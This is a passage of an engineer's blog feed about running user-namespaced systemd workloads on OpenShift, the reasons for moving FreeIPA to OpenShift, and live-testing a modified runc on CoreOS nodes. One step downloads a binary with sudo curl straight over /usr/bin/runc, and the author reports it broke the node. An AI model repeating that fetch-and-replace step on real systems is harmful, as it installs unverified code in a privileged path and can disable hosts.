<span id="cb15-9"><a href="#cb15-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span></code></pre></div>
<p>Note the <code>host</code> field. Its value is <code>nginx.apps.$CLUSTER_DOMAIN</code>.
Change it to the proper value for your cluster, then create the
route:</p>
<pre class="shell"><code>% oc create -f route-nginx.yaml
route.route.openshift.io/nginx created</code></pre>
<p>There is no pod to route the traffic to… yet.</p>
<h3 id="create-pod">Create pod <a href="#create-pod" class="section">§</a></h3>
<p>The pod specification is:</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb17-6"><a href="#cb17-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-7"><a href="#cb17-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb17-8"><a href="#cb17-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb17-9"><a href="#cb17-9" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb17-10"><a href="#cb17-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb17-11"><a href="#cb17-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">sysctls</span><span class="kw">:</span></span>
<span id="cb17-12"><a href="#cb17-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;net.ipv4.ping_group_range&quot;</span></span>
<span id="cb17-13"><a href="#cb17-13" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">value</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;0 65535&quot;</span></span>
<span id="cb17-14"><a href="#cb17-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb17-15"><a href="#cb17-15" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-16"><a href="#cb17-16" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> quay.io/ftweedal/test-nginx:latest</span></span>
<span id="cb17-17"><a href="#cb17-17" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">tty</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span></code></pre></div>
<p>Create the pod:</p>
<pre class="shell"><code>% oc --as test create -f pod-nginx.yaml
pod/nginx created</code></pre>
<p>After a few seconds, the pod is running:</p>
<pre class="shell"><code>% oc get -o json pod/nginx | jq .status.phase
&quot;Running&quot;</code></pre>
<p>Tail the pod’s log. Observe the final lines of systemd boot output
and the login prompt:</p>
<pre class="shell"><code>% oc logs --tail 10 pod/nginx
[  OK  ] Started The nginx HTTP and reverse proxy server.
[  OK  ] Reached target Multi-User System.
[  OK  ] Reached target Graphical Interface.
         Starting Update UTMP about System Runlevel Changes...
[  OK  ] Finished Update UTMP about System Runlevel Changes.

Fedora 33 (Container Image)
Kernel 4.18.0-305.3.1.el8_4.x86_64 on an x86_64 (console)

nginx login: %</code></pre>
<div class="note">
<p>Without <code>tty: true</code> in the <code>Container</code> spec, the pod won’t produce
any output and <code>oc logs</code> won’t have anything to show.</p>
</div>
<p>The log tail also shows that systemd started the <code>nginx</code> service.
We already set up a <code>route</code> in the previous step. Use <code>curl</code> to
issue an HTTP request and verify that the service is running
properly:</p>
<pre class="shell"><code>% curl --head \
    nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 21 Jul 2021 06:55:38 GMT
Content-Type: text/html
Content-Length: 5564
Last-Modified: Mon, 27 Jul 2020 22:20:49 GMT
ETag: &quot;5f1f5341-15bc&quot;
Accept-Ranges: bytes
Set-Cookie: 6cf5f3bc2fa4d24f45018c591d3617c3=f114e839b2eef9cdbe00856f18a06336; path=/; HttpOnly
Cache-control: private</code></pre>
<h3 id="verify-sandbox">Verify sandbox <a href="#verify-sandbox" class="section">§</a></h3>
<p>Now let’s verify that the container is indeed running in a user
namespace. Container UIDs must map to unprivileged UIDs on the
host. Query the worker node on which the pod is running, and its
CRI-O container ID:</p>
<pre class="shell"><code>% oc get -o json pod/nginx | jq \
    &#39;.spec.nodeName, .status.containerStatuses[0].containerID&#39;
&quot;ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w&quot;
&quot;cri-o://bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0&quot;</code></pre>
<p>Start a debug shell on the node and query the PID of the container
init process:</p>
<pre class="shell"><code>% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.4
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# crictl inspect bf2b3d | jq .info.pid
7759</code></pre>
<p>Query the UID map and process tree of the container:</p>
<pre class="shell"><code>sh-4.4# cat /proc/7759/uid_map
         0     200000      65536
sh-4.4# pgrep --ns 7759 | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
200000      7759 /sbin/init
200000      7796 /usr/lib/systemd/systemd-journald
200193      7803 /usr/lib/systemd/systemd-resolved
200000      7806 /usr/lib/systemd/systemd-homed
200000      7807 /usr/lib/systemd/systemd-logind
200081      7809 /usr/bin/dbus-broker-launch --scope system --audit
200000      7812 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 xterm
200081      7813 dbus-broker --log 4 --controller 9 --machine-id 2f2fcc4033c5428996568ca34219c72a --max-bytes 5
200000      7815 nginx: master process /usr/sbin/nginx
200999      7816 nginx: worker process
200999      7817 nginx: worker process
200999      7818 nginx: worker process
200999      7819 nginx: worker process</code></pre>
<p>This confirms that the container has a user namespace. The
container’s UID range is <code>0</code>–<code>65535</code>, which maps to the host UID
range <code>200000</code>–<code>265535</code>. The <code>ps</code> output shows the services
started by systemd, all running under unprivileged host UIDs in this
range.</p>
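<p>The arithmetic behind the mapping is simple. Each
<code>uid_map</code> line holds three fields: the first UID inside the
namespace, the first UID outside it, and the length of the range. Here
is a small sketch of the translation; the helper name
<code>host_uid</code> is hypothetical:</p>
<pre class="shell"><code># Sketch: translate a container UID to a host UID using one uid_map line.
# Arguments: container UID, then the three uid_map fields
# (first inside UID, first outside UID, range length).
host_uid() {
    cuid=$1 inside=$2 outside=$3 count=$4
    offset=$((cuid - inside))
    if [ "$offset" -ge 0 ]; then
        if [ "$offset" -lt "$count" ]; then
            echo $((outside + offset))
            return 0
        fi
    fi
    return 1   # this UID is not mapped in the namespace
}

# Container UID 999, using the uid_map shown above.
host_uid 999 0 200000 65536</code></pre>
<p>This prints <code>200999</code>, which is the host UID of the
<code>nginx</code> worker processes in the <code>ps</code> output.</p>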
<p>So, everything is running as expected. One last thing: let’s look
at the cgroup ownership. Query the container’s <code>cgroupsPath</code>:</p>
<pre class="shell"><code>sh-4.4# crictl inspect bf2b3d | jq .info.runtimeSpec.linux.cgroupsPath
&quot;kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice:crio:bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0&quot;</code></pre>
<p>The value isn’t a filesystem path. <code>runc</code> interprets it relative to
an implementation-defined location. We expect the cgroup directory
and the three files mentioned earlier to be owned by the user that
maps to UID <code>0</code> in the container’s user namespace. In my case,
that’s <code>200000</code>. We also expect to see scopes and slices created by
systemd <strong>in the container</strong> to be owned by the same user.</p>
<pre class="shell"><code>sh-4.4# ls -ali /sys/fs/cgroup\
/kubepods.slice/kubepods-besteffort.slice\
/kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice\
/crio-bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0.scope \
    | grep 200000
14755 drwxr-xr-x.  5 200000 root   0 Jul 21 06:00 .
14757 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.procs
14760 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.subtree_control
14758 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.threads
14806 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 init.scope
14835 drwxr-xr-x. 11 200000 200000 0 Jul 21 06:15 system.slice
14922 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 user.slice</code></pre>
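<p>The directory used in the <code>ls</code> command above follows from
the <code>cgroupsPath</code> value. The sketch below reproduces that
translation. It assumes the <code>slice:prefix:name</code> convention
of the systemd cgroup driver and a cgroup v2 hierarchy mounted at
<code>/sys/fs/cgroup</code>. The function names are illustrative; the
real logic lives in the runtime, so treat this as an approximation.</p>
<pre class="shell"><code># Sketch: expand a systemd slice name into its nested directory path,
# e.g. a-b-c.slice becomes a.slice/a-b.slice/a-b-c.slice
expand_slice() {
    name=${1%.slice}
    path=
    prefix=
    old_ifs=$IFS
    IFS=-
    for part in $name; do
        prefix=${prefix:+$prefix-}$part
        path=$path/$prefix.slice
    done
    IFS=$old_ifs
    printf '%s\n' "${path#/}"
}

# Sketch: turn a "slice:prefix:name" cgroupsPath into a directory.
# Assumption: cgroup v2 is mounted at /sys/fs/cgroup.
cgroup_dir() {
    slice=${1%%:*}
    rest=${1#*:}
    scope_prefix=${rest%%:*}
    scope_name=${rest#*:}
    printf '/sys/fs/cgroup/%s/%s-%s.scope\n' \
        "$(expand_slice "$slice")" "$scope_prefix" "$scope_name"
}</code></pre>
<p>Passing the <code>cgroupsPath</code> string from the
<code>crictl inspect</code> output to <code>cgroup_dir</code> yields the
same directory that was listed above.</p>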
<p>Note the <em>inode</em> of the container cgroup directory: <code>14755</code>. We can query the
inode and ownership of <code>/sys/fs/cgroup</code> <em>within the pod</em>:</p>
<pre class="shell"><code>% oc exec pod/nginx -- ls -ldi /sys/fs/cgroup
14755 drwxr-xr-x. 5 root nobody 0 Jul 21 06:00 /sys/fs/cgroup</code></pre>
<p>The inode is the same; this is indeed the same cgroup. But within the
container’s user namespace, the owner appears as <code>root</code>.</p>
<p>This concludes the verification steps. With my modified version of
<code>runc</code>, systemd-based workloads are indeed working properly in user
namespaces.</p>
<h2 id="next-steps">Next steps <a href="#next-steps" class="section">§</a></h2>
<p>I submitted a <a href="https://github.com/opencontainers/runc/pull/3057">pull request</a> with these changes. It remains to be
seen if the general approach will be accepted, but initial feedback
is positive. Some implementation changes are needed. I might have
to hide the behaviour behind a feature gate (e.g. to be activated
via an annotation). I also need to write tests and documentation.</p>
<p>I also need to raise a ticket for the SCC issue. The requirement
for <code>RunAsAny</code> (which is granted by the <code>anyuid</code> SCC) should be
relaxed when the sandbox has a user namespace. The SCC enforcement
machinery needs to be enhanced to understand user namespaces, so
that unprivileged OpenShift user accounts can run workloads in them.</p>
<p>It would be nice to find a way to avoid the sysctl override to allow
the container user to use <code>ping</code>. This is a much lower priority.</p>
<p>Alongside these matters, I can begin testing the FreeIPA container
in the test environment. Although systemd is now working, I need to
see if FreeIPA’s constituent services will run properly. I
anticipate that I will need to tweak the Pod configuration somewhat.
But are there more runtime capability gaps waiting to be discovered?
I don’t have a particular suspicion about it, but I do need to know
for certain, one way or the other. So expect another blog post
soon!</p>]]></summary>
</entry>
<entry>
    <title>FreeIPA on OpenShift: July 2021 update</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-07-21-freeipa-on-openshift-update.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-07-21-freeipa-on-openshift-update.html</id>
    <published>2021-07-21T00:00:00Z</published>
    <updated>2021-07-21T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="freeipa-on-openshift-july-2021-update">FreeIPA on OpenShift: July 2021 update</h1>
<p>Over the last year I’ve done a lot of investigation into OpenShift,
and container runtimes more generally. The driver of this work is
the FreeIPA on OpenShift project (known within Red Hat as IDMOCP).
I published the results of my investigations in numerous blog posts,
but I have not yet written much about <em>why</em> we are doing this at
all.</p>
<p>So it’s time to fix that. In this short post I discuss why we want
FreeIPA on OpenShift, and the major decision that put us on our
current implementation path.</p>
<p>FreeIPA is a centralised identity management system for the
enterprise. You enrol users, hosts and services, and configure
access policies and other security mechanisms. The system provides
authentication and policy enforcement mechanisms. It is similar to
Microsoft Active Directory (and indeed can integrate with AD).
FreeIPA is a complex system with lots of components including:</p>
<ul>
<li>LDAP server (389 DS / RHDS)</li>
<li>Kerberos KDC (MIT Kerberos)</li>
<li>Certificate authority (Dogtag / RHCS)</li>
<li>HTTP API (Apache httpd and a lot of Python code)</li>
<li>Host client daemon (SSSD)</li>
<li>several smaller supporting services</li>
<li>installation and administration tools</li>
</ul>
<p>FreeIPA is available on Fedora and RHEL. You install the RPMs and
the installation program configures the system. It is intended to
be deployed on a dedicated machine (VM or bare metal).</p>
<p>We are motivated to support FreeIPA on OpenShift for several
reasons, including:</p>
<ul>
<li><p>Easily providing identity services to applications running on
OpenShift.</p></li>
<li><p>Leveraging OpenShift and Kubernetes orchestration, scaling and
management features to improve robustness and reduce management
overhead of FreeIPA deployments.</p></li>
<li><p>Offering FreeIPA, hosted on OpenShift, as a managed service.</p></li>
</ul>
<p>Understandably, moving such an application to OpenShift is a
non-trivial task. At the beginning of this effort, we had to decide
the main implementation approach. There were three options:</p>
<ol type="1">
<li><p>Put the whole system in a single “monolithic container”, with
systemd as the init process. At the time (and still today)
OpenShift only supports running systemd workloads in privileged
containers, which is not acceptable. The runtime needs to evolve
to support this use case. Work on <em>some</em> of the missing features
(such as user namespaces and cgroups v2) was already underway.</p></li>
<li><p>Deploy different parts of the FreeIPA system in different
containers, running unprivileged. This is a fundamental shift
from the current architecture and a huge up-front engineering
effort. Also, the current architecture has to be maintained and
supported for a long time (&gt;10 years). So this approach brings
a substantial ongoing cost in maintaining two architectures of
the same application. On a technical level, this approach is
feasible today.</p></li>
<li><p>Use a VM-based workload (Kata / OpenShift Sandboxed Containers).
This option probably has the lowest up-front and ongoing
engineering costs. But it requires a bare metal cluster or
nested virtualisation, which is not available from most cloud
providers. By extension, <a href="https://www.openshift.com/products/dedicated/">OpenShift Dedicated (OSD)</a> also
does not support it. Red Hat managed services run on OSD.
Offering a managed service is one of the motivators of our
effort. So at this time, VM-based workloads are not an option
for us.</p></li>
</ol>
<p>As a small team, and considering the business reality of the
existing offering as part of RHEL, we decided to pursue the
“monolithic container” approach. We are depending on the OpenShift
runtime evolving to a point where it can support fully isolated
systemd-based workloads. And that is why I have invested much of
the last 12 months in understanding container runtimes and pushing
their limits.</p>
<p>Our approach is not “cloud native” and indeed many people have
expressed alarm or confusion when we tell them what we are doing.
Certainly, if we were designing FreeIPA from the ground up in
today’s world, it would look very different from the current
architecture. But this is the reality: if you want customers to
bring their mature, complex applications onto OpenShift, don’t
expect them to spend big money and assume big risk to rearchitect
the application to fit the new environment.</p>
<p>What customers actually need is to be able to bring the application
across more or less as-is. Then they can realise the benefits
(automation, monitoring, scaling, etc) <em>incrementally</em>, with lower
up-front costs and less risk.</p>
<p>If my claims are correct, then proper systemd workload support in
OpenShift will be a Very Big Deal. But even if I’m wrong, it is
still critical for our FreeIPA on OpenShift effort. And it is
achievable. In my next post I’ll demonstrate my working proof of
concept for user-namespaced systemd workloads on OpenShift.</p>]]></summary>
</entry>
<entry>
    <title>Live-testing changes in OpenShift clusters</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-06-29-openshift-live-changes.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-06-29-openshift-live-changes.html</id>
    <published>2021-06-29T00:00:00Z</published>
    <updated>2021-06-29T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="live-testing-changes-in-openshift-clusters">Live-testing changes in OpenShift clusters</h1>
<p>I have been hacking on the <a href="https://github.com/opencontainers/runc"><code>runc</code></a> container runtime. So how
do I test my changes in an OpenShift cluster?</p>
<p>One option is to compose a <code>machine-os-content</code> release via
<a href="https://github.com/coreos/coreos-assembler"><em>coreos-assembler</em></a>.
Then you can deploy or upgrade a cluster with that release. Indeed,
this approach is <em>necessary</em> for testing installation and upgrades.
It also seems useful for publishing modified versions for other
people to test. But it is a heavyweight and time-consuming option.</p>
<p>For development I want a more lightweight approach. In this post
I’ll demonstrate how to use the <code>rpm-ostree usroverlay</code> and
<code>rpm-ostree override replace</code> commands to test changes in a live
OpenShift cluster.</p>
<h2 id="background">Background <a href="#background" class="section">§</a></h2>
<p>OpenShift runs on CoreOS. CoreOS uses <a href="https://en.wikipedia.org/wiki/OSTree"><em>OSTree</em></a> to manage
the filesystem. Most of the filesystem is immutable. When
upgrading, a new filesystem is prepared before rebooting the system.
The old filesystem is preserved, so it is easy to roll back.</p>
<p>So I can’t just log onto an OpenShift node and replace
<code>/usr/bin/runc</code> with my modified version. Nevertheless, I have seen
<a href="https://github.com/openshift/machine-config-operator/blob/master/docs/HACKING.md#directly-applying-changes-live-to-a-node">references</a> to the <code>rpm-ostree usroverlay</code> command. It is
supposed to provide a writable overlayfs on <code>/usr</code>, so that you can
test modifications. Changes are lost upon reboot, but that’s fine
for testing.</p>
<p>There’s also the <code>rpm-ostree override replace …</code> command. This
command works on the level of RPM packages. It allows you to
install new packages or replace or remove packages. Changes persist
across reboots, but it is easy to roll back to the <em>pristine</em> state
of the current CoreOS release.</p>
<p>The rest of this article explores how to use these two commands to
apply changes to the cluster.</p>
<h2 id="usroverlay-via-debug-container-doesnt-work"><code>usroverlay</code> via debug container (doesn’t work) <a href="#usroverlay-via-debug-container-doesnt-work" class="section">§</a></h2>
<p>I first attempted to use <code>rpm-ostree usroverlay</code> in a node debug
pod.</p>
<pre class="shell"><code>% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
sh-4.4# touch /usr/bin/foo
touch: cannot touch &#39;/usr/bin/foo&#39;: Read-only file system</code></pre>
<p>The <code>rpm-ostree usroverlay</code> command succeeded. But <code>/usr</code> remained
read-only. The debug container has its own mount namespace, which
was unaffected. I guess that I need to log into the node directly
to use the writable <code>/usr</code> overlay. Perhaps it is also necessary to
execute <code>rpm-ostree usroverlay</code> as an unconfined user (in the
SELinux sense). I <strong>restarted the node</strong> to begin afresh:</p>
<pre class="shell"><code>sh-4.4# reboot

Removing debug pod ...</code></pre>
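<p>One way to check the mount namespace explanation is to compare
namespace identifiers under <code>/proc</code>. This sketch assumes the
debug pod shares the host PID namespace, so that PID 1 is the host’s
init process; that assumption is not verified here. The function name
<code>same_mount_ns</code> is illustrative.</p>
<pre class="shell"><code># Sketch: succeed if two processes share a mount namespace.
# Arguments are PIDs, or the literal word "self".
same_mount_ns() {
    ns_a=$(readlink "/proc/$1/ns/mnt") || return 2
    ns_b=$(readlink "/proc/$2/ns/mnt") || return 2
    [ "$ns_a" = "$ns_b" ]
}

# Hypothetical usage in the debug shell:
#   same_mount_ns self 1 || echo "not in the host mount namespace"</code></pre>
<p>If the two identifiers differ, a mount made by <code>rpm-ostree
usroverlay</code> in the host’s namespace would not be visible from the
debug shell, which is consistent with the behaviour observed above.</p>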
<h2 id="usroverlay-via-ssh"><code>usroverlay</code> via SSH <a href="#usroverlay-via-ssh" class="section">§</a></h2>
<p>For the next attempt, I logged into the worker node over SSH. The
first step was to add the SSH public key to the <code>core</code> user’s
<code>authorized_keys</code> file. Roberto Carratalá’s <a href="https://rcarrata.com/openshift/update-workers-ssh/">helpful blog post</a>
explains how to do this. I will recap the critical bits.</p>
<p>SSH keys can be added via <code>MachineConfig</code> objects, which must also
specify the machine role (e.g. <code>worker</code>). The Machine Config
Operator will only add keys to the <code>core</code> user. Multiple keys can
be specified, across multiple <code>MachineConfig</code> objects—all the keys
in matching objects will be included.</p>
<div class="note">
<p>I don’t have direct network access to the worker node. So how could
I log in over SSH? I generated a key <strong><em>in the node debug shell</em></strong>,
and will log in from there!</p>
<pre class="shell"><code>sh-4.4# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory &#39;/root/.ssh&#39;.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:jAmv…NMnY root@worker-a
sh-4.4# cat ~/.ssh/id_rsa.pub
ssh-rsa AAAA…4OU= root@worker-a</code></pre>
</div>
<p>The following <code>MachineConfig</code> adds the SSH key for user <code>core</code>:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> ssh-authorized-keys-worker</span></span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb4-9"><a href="#cb4-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb4-10"><a href="#cb4-10" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.2.0</span></span>
<span id="cb4-11"><a href="#cb4-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">passwd</span><span class="kw">:</span></span>
<span id="cb4-12"><a href="#cb4-12" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">users</span><span class="kw">:</span></span>
<span id="cb4-13"><a href="#cb4-13" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> core</span></span>
<span id="cb4-14"><a href="#cb4-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">sshAuthorizedKeys</span><span class="kw">:</span></span>
<span id="cb4-15"><a href="#cb4-15" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> ssh-rsa AAAA…4OU= root@worker-a</span></span></code></pre></div>
<p>I created the <code>MachineConfig</code>:</p>
<pre class="shell"><code>% oc create -f machineconfig-ssh-worker.yaml
machineconfig.machineconfiguration.openshift.io/ssh-authorized-keys-worker created</code></pre>
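<p>Because the role and the key are the only parts of the manifest
that vary, it could also be generated. The following is a minimal
sketch, not part of the original procedure; the function name
<code>render_ssh_machineconfig</code> and the naming scheme
<code>ssh-authorized-keys-ROLE</code> are assumptions.</p>
<pre class="shell"><code># Sketch: print a MachineConfig that adds one SSH key for user "core".
#   $1: machine role (e.g. worker)   $2: public key line
render_ssh_machineconfig() {
    role=$1
    pubkey=$2
    printf '%s\n' \
        "apiVersion: machineconfiguration.openshift.io/v1" \
        "kind: MachineConfig" \
        "metadata:" \
        "  name: ssh-authorized-keys-$role" \
        "  labels:" \
        "    machineconfiguration.openshift.io/role: $role" \
        "spec:" \
        "  config:" \
        "    ignition:" \
        "      version: 3.2.0" \
        "    passwd:" \
        "      users:" \
        "      - name: core" \
        "        sshAuthorizedKeys:" \
        "        - $pubkey"
}

# Hypothetical usage:
#   render_ssh_machineconfig worker "$(cat ~/.ssh/id_rsa.pub)" | oc create -f -</code></pre>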
<p>In the node debug shell, I observed that Machine Config Operator
applied the change after a few seconds. It did not restart the
worker node. My key was added alongside a key defined in some other
<code>MachineConfig</code>.</p>
<pre class="shell"><code>sh-4.4# cat /var/home/core/.ssh/authorized_keys
ssh-rsa AAAA…jjNV devenv

ssh-rsa AAAA…4OU= root@worker-a</code></pre>
<p>Now I could log in over SSH:</p>
<pre class="shell"><code>sh-4.4# ssh core@$(hostname)
The authenticity of host &#39;worker-a (10.0.128.2)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:LUaZOleqVFunmLCp4/E1naIQ+E5BpmVp0gcsXHGacPE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added &#39;worker-a,10.0.128.2&#39; (ECDSA) to the list of known hosts.
Red Hat Enterprise Linux CoreOS 48.84.202106231817-0
  Part of OpenShift 4.8, RHCOS is a Kubernetes native operating system
  managed by the Machine Config Operator (`clusteroperator/machine-config`).

WARNING: Direct SSH access to machines is not recommended; instead,
make configuration changes via `machineconfig` objects:
  https://docs.openshift.com/container-platform/4.8/architecture/architecture-rhcos.html

---
[core@worker-a ~]$</code></pre>
<p>The user is unconfined and I can see the normal, read-only (<code>ro</code>)
<code>/usr</code> mount (but no overlay):</p>
<pre class="shell"><code>[core@worker-a ~]$ id -Z
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[core@worker-a ~]$ mount |grep &quot;on /usr&quot;
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.KZ4V50/upper,workdir=/var/tmp/ostree-unlock-ovl.KZ4V50/work)</code></pre>
<p>I executed <code>rpm-ostree usroverlay</code> via <code>sudo</code>. After that, a
read-write (<code>rw</code>) overlay filesystem is visible:</p>
<pre class="shell"><code>[core@worker-a ~]$ sudo rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
[core@worker-a ~]$ mount |grep &quot;on /usr&quot;
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.TCPM50/upper,workdir=/var/tmp/ostree-unlock-ovl.TCPM50/work)</code></pre>
<p>And it is indeed writable. I made a copy of the original <code>runc</code>
binary, then installed my modified version:</p>
<pre class="shell"><code>[core@worker-a ~]$ sudo cp /usr/bin/runc /usr/bin/runc.orig
[core@worker-a ~]$ sudo curl -Ss -o /usr/bin/runc \
    https://ftweedal.fedorapeople.org/runc</code></pre>
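<p>The before-and-after check of the <code>/usr</code> mounts can be
scripted. This sketch reads <code>mount</code> output on standard input
and reports the mode of an overlay on <code>/usr</code>, if there is
one. The function name <code>usr_overlay_mode</code> is illustrative,
and the parsing assumes the line format shown in the output above.</p>
<pre class="shell"><code># Sketch: print "rw" or "ro" for an overlay mounted on /usr,
# or "none" if no overlay is mounted there.
# Expects lines like: overlay on /usr type overlay (rw,relatime,...)
usr_overlay_mode() {
    awk '$3 == "/usr" {
             if ($5 == "overlay") {
                 # $6 looks like "(rw,relatime,...)"; drop the "("
                 split(substr($6, 2), opts, ",")
                 mode = opts[1]
             }
         }
         END { print (mode == "" ? "none" : mode) }'
}

# Hypothetical usage on the node:
#   mount | usr_overlay_mode</code></pre>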
<h2 id="digression-use-a-buildroot">Digression: use a buildroot <a href="#digression-use-a-buildroot" class="section">§</a></h2>
<p>The <code>runc</code> executable I installed in the previous step didn’t work.
I had built it on my workstation, against a too-new version of
<em>glibc</em>. The OpenShift node (which was running RHCOS 4.8, based on
RHEL 8.4) was unable to link <code>runc</code>. Therefore it could not run
<em>any</em> container workloads. I was able to SSH in from another node
and reboot, discarding the transient change in the <code>usroverlay</code> and
restoring the node to a functional state.</p>
<p>All of this is obvious in hindsight. You have to build the program
